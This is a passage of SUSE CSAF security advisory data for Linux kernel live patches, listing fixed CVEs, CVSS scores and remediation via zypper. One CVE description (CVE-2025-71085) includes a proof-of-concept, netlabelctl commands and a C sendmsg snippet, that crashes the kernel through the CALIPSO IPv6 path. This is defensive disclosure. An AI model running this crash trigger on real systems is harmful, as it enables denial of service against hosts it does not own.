"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68813",
"url": "https://www.suse.com/security/cve/CVE-2025-68813"
},
{
"category": "external",
"summary": "SUSE Bug 1256641 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256641"
},
{
"category": "external",
"summary": "SUSE Bug 1256644 for CVE-2025-68813",
"url": "https://bugzilla.suse.com/1256644"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-68813"
},
{
"cve": "CVE-2025-71085",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71085"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()\n\nThere exists a kernel oops caused by a BUG_ON(nhead \u003c 0) at\nnet/core/skbuff.c:2232 in pskb_expand_head().\nThis bug is triggered as part of the calipso_skbuff_setattr()\nroutine when skb_cow() is passed headroom \u003e INT_MAX\n(i.e. (int)(skb_headroom(skb) + len_delta) \u003c 0).\n\nThe root cause of the bug is due to an implicit integer cast in\n__skb_cow(). The check (headroom \u003e skb_headroom(skb)) is meant to ensure\nthat delta = headroom - skb_headroom(skb) is never negative, otherwise\nwe will trigger a BUG_ON in pskb_expand_head(). However, if\nheadroom \u003e INT_MAX and delta \u003c= -NET_SKB_PAD, the check passes, delta\nbecomes negative, and pskb_expand_head() is passed a negative value for\nnhead.\n\nFix the trigger condition in calipso_skbuff_setattr(). Avoid passing\n\"negative\" headroom sizes to skb_cow() within calipso_skbuff_setattr()\nby only using skb_cow() to grow headroom.\n\nPoC:\n\tUsing `netlabelctl` tool:\n\n netlabelctl map del default\n netlabelctl calipso add pass doi:7\n netlabelctl map add default address:0::1/128 protocol:calipso,7\n\n Then run the following PoC:\n\n int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);\n\n // setup msghdr\n int cmsg_size = 2;\n int cmsg_len = 0x60;\n struct msghdr msg;\n struct sockaddr_in6 dest_addr;\n struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1,\n sizeof(struct cmsghdr) + cmsg_len);\n msg.msg_name = \u0026dest_addr;\n msg.msg_namelen = sizeof(dest_addr);\n msg.msg_iov = NULL;\n msg.msg_iovlen = 0;\n msg.msg_control = cmsg;\n msg.msg_controllen = cmsg_len;\n msg.msg_flags = 0;\n\n // setup sockaddr\n dest_addr.sin6_family = AF_INET6;\n dest_addr.sin6_port = htons(31337);\n dest_addr.sin6_flowinfo = htonl(31337);\n dest_addr.sin6_addr = in6addr_loopback;\n dest_addr.sin6_scope_id = 31337;\n\n // setup cmsghdr\n cmsg-\u003ecmsg_len = cmsg_len;\n cmsg-\u003ecmsg_level = IPPROTO_IPV6;\n cmsg-\u003ecmsg_type = IPV6_HOPOPTS;\n char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);\n hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80\n\n sendmsg(fd, \u0026msg, 0);",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71085",
"url": "https://www.suse.com/security/cve/CVE-2025-71085"
},
{
"category": "external",
"summary": "SUSE Bug 1256623 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256623"
},
{
"category": "external",
"summary": "SUSE Bug 1256624 for CVE-2025-71085",
"url": "https://bugzilla.suse.com/1256624"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_100-default-15-150500.2.2.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T01:34:07Z",
"details": "important"
}
],
"title": "CVE-2025-71085"
}
]
}
SUSE-SU-2026:1059-1
Vulnerability from csaf_suse - Published: 2026-03-26 10:04 - Updated: 2026-03-26 10:04Summary
Security update for the Linux Kernel (Live Patch 34 for SUSE Linux Enterprise 15 SP5)
Severity
Important
Notes
Title of the patch: Security update for the Linux Kernel (Live Patch 34 for SUSE Linux Enterprise 15 SP5)
Description of the patch:
This update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.133 fixes various security issues
The following security issues were fixed:
- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).
- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).
- CVE-2025-38159: wifi: rtw88: fix the 'para' buffer size to avoid reading out of bounds (bsc#1257629).
- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).
- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).
Patchnames: SUSE-2026-1059,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1059
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.8 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
3 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
39 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for the Linux Kernel (Live Patch 34 for SUSE Linux Enterprise 15 SP5)",
"title": "Title of the patch"
},
{
"category": "description",
"text": "\nThis update for the SUSE Linux Enterprise Kernel 5.14.21-150500.55.133 fixes various security issues\n\nThe following security issues were fixed:\n\n- CVE-2022-50697: mrp: introduce active flags to prevent UAF when applicant uninit (bsc#1255595).\n- CVE-2025-21738: ata: libata-sff: ensure that we cannot write outside the allocated buffer (bsc#1257118).\n- CVE-2025-38159: wifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds (bsc#1257629).\n- CVE-2025-68284: libceph: prevent potential out-of-bounds writes in handle_auth_session_key() (bsc#1255378).\n- CVE-2025-68285: libceph: fix potential use-after-free in have_mon_and_osd_map() (bsc#1255402).\n- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256644).\n- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256624).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2026-1059,SUSE-SLE-Module-Live-Patching-15-SP5-2026-1059",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_1059-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:1059-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20261059-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:1059-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2026-March/024940.html"
},
{
"category": "self",
"summary": "SUSE Bug 1255378",
"url": "https://bugzilla.suse.com/1255378"
},
{
"category": "self",
"summary": "SUSE Bug 1255402",
"url": "https://bugzilla.suse.com/1255402"
},
{
"category": "self",
"summary": "SUSE Bug 1255595",
"url": "https://bugzilla.suse.com/1255595"
},
{
"category": "self",
"summary": "SUSE Bug 1256624",
"url": "https://bugzilla.suse.com/1256624"
},
{
"category": "self",
"summary": "SUSE Bug 1256644",
"url": "https://bugzilla.suse.com/1256644"
},
{
"category": "self",
"summary": "SUSE Bug 1257118",
"url": "https://bugzilla.suse.com/1257118"
},
{
"category": "self",
"summary": "SUSE Bug 1257629",
"url": "https://bugzilla.suse.com/1257629"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2022-50697 page",
"url": "https://www.suse.com/security/cve/CVE-2022-50697/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-21738 page",
"url": "https://www.suse.com/security/cve/CVE-2025-21738/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-38159 page",
"url": "https://www.suse.com/security/cve/CVE-2025-38159/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68284 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68284/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68285 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68285/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-68813 page",
"url": "https://www.suse.com/security/cve/CVE-2025-68813/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-71085 page",
"url": "https://www.suse.com/security/cve/CVE-2025-71085/"
}
],
"title": "Security update for the Linux Kernel (Live Patch 34 for SUSE Linux Enterprise 15 SP5)",
"tracking": {
"current_release_date": "2026-03-26T10:04:27Z",
"generator": {
"date": "2026-03-26T10:04:27Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:1059-1",
"initial_release_date": "2026-03-26T10:04:27Z",
"revision_history": [
{
"date": "2026-03-26T10:04:27Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"product_id": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"product_id": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64",
"product": {
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64",
"product_id": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product": {
"name": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-live-patching:15:sp5"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64 as component of SUSE Linux Enterprise Live Patching 15 SP5",
"product_id": "SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
},
"product_reference": "kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Live Patching 15 SP5"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-50697",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2022-50697"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmrp: introduce active flags to prevent UAF when applicant uninit\n\nThe caller of del_timer_sync must prevent restarting of the timer, If\nwe have no this synchronization, there is a small probability that the\ncancellation will not be successful.\n\nAnd syzbot report the fellowing crash:\n==================================================================\nBUG: KASAN: use-after-free in hlist_add_head include/linux/list.h:929 [inline]\nBUG: KASAN: use-after-free in enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\nWrite at addr f9ff000024df6058 by task syz-fuzzer/2256\nPointer tag: [f9], memory tag: [fe]\n\nCPU: 1 PID: 2256 Comm: syz-fuzzer Not tainted 6.1.0-rc5-syzkaller-00008-\nge01d50cbd6ee #0\nHardware name: linux,dummy-virt (DT)\nCall trace:\n dump_backtrace.part.0+0xe0/0xf0 arch/arm64/kernel/stacktrace.c:156\n dump_backtrace arch/arm64/kernel/stacktrace.c:162 [inline]\n show_stack+0x18/0x40 arch/arm64/kernel/stacktrace.c:163\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0x68/0x84 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:284 [inline]\n print_report+0x1a8/0x4a0 mm/kasan/report.c:395\n kasan_report+0x94/0xb4 mm/kasan/report.c:495\n __do_kernel_fault+0x164/0x1e0 arch/arm64/mm/fault.c:320\n do_bad_area arch/arm64/mm/fault.c:473 [inline]\n do_tag_check_fault+0x78/0x8c arch/arm64/mm/fault.c:749\n do_mem_abort+0x44/0x94 arch/arm64/mm/fault.c:825\n el1_abort+0x40/0x60 arch/arm64/kernel/entry-common.c:367\n el1h_64_sync_handler+0xd8/0xe4 arch/arm64/kernel/entry-common.c:427\n el1h_64_sync+0x64/0x68 arch/arm64/kernel/entry.S:576\n hlist_add_head include/linux/list.h:929 [inline]\n enqueue_timer+0x18/0xa4 kernel/time/timer.c:605\n mod_timer+0x14/0x20 kernel/time/timer.c:1161\n mrp_periodic_timer_arm net/802/mrp.c:614 [inline]\n mrp_periodic_timer+0xa0/0xc0 net/802/mrp.c:627\n call_timer_fn.constprop.0+0x24/0x80 kernel/time/timer.c:1474\n expire_timers+0x98/0xc4 kernel/time/timer.c:1519\n\nTo fix it, we can introduce a new active flags to make sure the timer will\nnot restart.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2022-50697",
"url": "https://www.suse.com/security/cve/CVE-2022-50697"
},
{
"category": "external",
"summary": "SUSE Bug 1255594 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255594"
},
{
"category": "external",
"summary": "SUSE Bug 1255595 for CVE-2022-50697",
"url": "https://bugzilla.suse.com/1255595"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:04:27Z",
"details": "important"
}
],
"title": "CVE-2022-50697"
},
{
"cve": "CVE-2025-21738",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-21738"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nata: libata-sff: Ensure that we cannot write outside the allocated buffer\n\nreveliofuzzing reported that a SCSI_IOCTL_SEND_COMMAND ioctl with out_len\nset to 0xd42, SCSI command set to ATA_16 PASS-THROUGH, ATA command set to\nATA_NOP, and protocol set to ATA_PROT_PIO, can cause ata_pio_sector() to\nwrite outside the allocated buffer, overwriting random memory.\n\nWhile a ATA device is supposed to abort a ATA_NOP command, there does seem\nto be a bug either in libata-sff or QEMU, where either this status is not\nset, or the status is cleared before read by ata_sff_hsm_move().\nAnyway, that is most likely a separate bug.\n\nLooking at __atapi_pio_bytes(), it already has a safety check to ensure\nthat __atapi_pio_bytes() cannot write outside the allocated buffer.\n\nAdd a similar check to ata_pio_sector(), such that also ata_pio_sector()\ncannot write outside the allocated buffer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-21738",
"url": "https://www.suse.com/security/cve/CVE-2025-21738"
},
{
"category": "external",
"summary": "SUSE Bug 1238917 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1238917"
},
{
"category": "external",
"summary": "SUSE Bug 1257118 for CVE-2025-21738",
"url": "https://bugzilla.suse.com/1257118"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-26T10:04:27Z",
"details": "important"
}
],
"title": "CVE-2025-21738"
},
{
"cve": "CVE-2025-38159",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38159"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw88: fix the \u0027para\u0027 buffer size to avoid reading out of bounds\n\nSet the size to 6 instead of 2, since \u0027para\u0027 array is passed to\n\u0027rtw_fw_bt_wifi_control(rtwdev, para[0], \u0026para[1])\u0027, which reads\n5 bytes:\n\nvoid rtw_fw_bt_wifi_control(struct rtw_dev *rtwdev, u8 op_code, u8 *data)\n{\n ...\n SET_BT_WIFI_CONTROL_DATA1(h2c_pkt, *data);\n SET_BT_WIFI_CONTROL_DATA2(h2c_pkt, *(data + 1));\n ...\n SET_BT_WIFI_CONTROL_DATA5(h2c_pkt, *(data + 4));\n\nDetected using the static analysis tool - Svace.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38159",
"url": "https://www.suse.com/security/cve/CVE-2025-38159"
},
{
"category": "external",
"summary": "SUSE Bug 1245751 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1245751"
},
{
"category": "external",
"summary": "SUSE Bug 1257629 for CVE-2025-38159",
"url": "https://bugzilla.suse.com/1257629"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Live Patching 15 SP5:kernel-livepatch-5_14_21-150500_55_133-default-3-150500.2.1.ppc64le",
